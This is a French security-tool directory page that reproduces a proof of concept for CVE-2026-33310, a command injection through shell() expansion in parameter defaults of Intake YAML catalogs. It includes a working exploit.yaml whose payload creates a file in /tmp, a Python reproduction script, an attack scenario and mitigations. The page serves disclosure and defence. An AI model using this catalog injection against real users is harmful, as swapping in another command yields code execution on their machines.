Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-33310 — Preuve de concept démontrant une injection de commande via l'expansion shell() dans les valeurs par défaut des paramètres des catalogues Intake, avec un YAML d'exploitation et un script de reproduction. | Kitploit
Outils/GitHubGitHub/redyank/cve-2026-33310
Génération de PayloadsAnalyse des VulnérabilitésExploitationSécurité WebCommandement et Contrôle
GitHubredyank/cve-2026-33310

CVE-2026-33310

Preuve de concept démontrant une injection de commande via l'expansion shell() dans les valeurs par défaut des paramètres des catalogues Intake, avec un YAML d'exploitation et un script de reproduction.

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-33310

CVE-2026-33310 (Injection de commande via l'expansion shell() dans les valeurs par défaut des paramètres)

Résumé

La syntaxe shell() dans les valeurs par défaut des paramètres semble être automatiquement développée lors du processus d'analyse du catalogue. Si un catalogue contient une valeur par défaut de paramètre telle que shell(), la commande peut être exécutée lorsque la source du catalogue est accédée. Cela signifie que si un utilisateur charge un catalogue YAML malveillant, des commandes intégrées pourraient s'exécuter sur le système hôte. Ce comportement pourrait potentiellement être classé comme CWE-78 : Injection de commande du système d'exploitation / Expansion shell non sécurisée.

Détails

Le problème semble provenir de la manière dont les valeurs par défaut des paramètres sont développées lorsqu'une source de catalogue est accédée.

Lors du chargement du catalogue et de l'accès à la source :

Intake résout les valeurs par défaut des paramètres La fonction responsable du développement des valeurs par défaut traite la syntaxe shell() L'expression shell() déclenche l'exécution d'un sous-processus Comme cela se produit pendant l'évaluation du catalogue, la commande peut s'exécuter avant que l'utilisateur n'interagisse explicitement avec le jeu de données lui-même.

La logique affectée semble impliquer :

root@kitploit:~
expand_defaults()

et les mécanismes associés d'analyse des paramètres.

Preuve de concept

exploit.yaml

root@kitploit:~
metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "Test de l'expansion shell dans les paramètres"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "Paramètre de test"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

root@kitploit:~
import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] Fichier de preuve existant avant : {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("Accès à la source...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" Erreur pendant l'exécution : {e}")

if os.path.exists(PROOF_FILE):
    print(f" Exécution de commande confirmée, trouvé : {PROOF_FILE}")
else:
    print("L'exécution de commande n'a pas eu lieu.")

Scénario d'attaque

Un scénario d'attaque potentiel pourrait être :

  1. Un attaquant publie un fichier de catalogue Intake YAML malveillant
  2. La victime télécharge ou charge le catalogue
  3. La victime accède à une entrée de source dans le catalogue
  4. Les valeurs par défaut des paramètres sont développées
  5. L'expression shell() déclenche l'exécution de la commande intégrée

Impact

Si ce comportement est confirmé comme non intentionnel, un attaquant pourrait distribuer un fichier de catalogue malveillant via :

  • des dépôts Git
  • des jeux de données partagés
  • des URL
  • des flux de travail de science des données
  • Tout utilisateur chargeant le catalogue pourrait exécuter sans le savoir des commandes avec ses privilèges utilisateur locaux.

Recommandation

Les atténuations possibles pourraient inclure :

  • désactiver l'expansion shell() par défaut
  • exiger un indicateur d'adhésion explicite (par exemple, allow_shell=True)
  • restreindre l'exécution shell pour les catalogues chargés depuis des sources non fiables Veuillez me faire savoir si des informations supplémentaires ou des tests sont nécessaires. Je suis heureux d'aider avec une analyse ou une validation supplémentaire.
Télécharger l’outil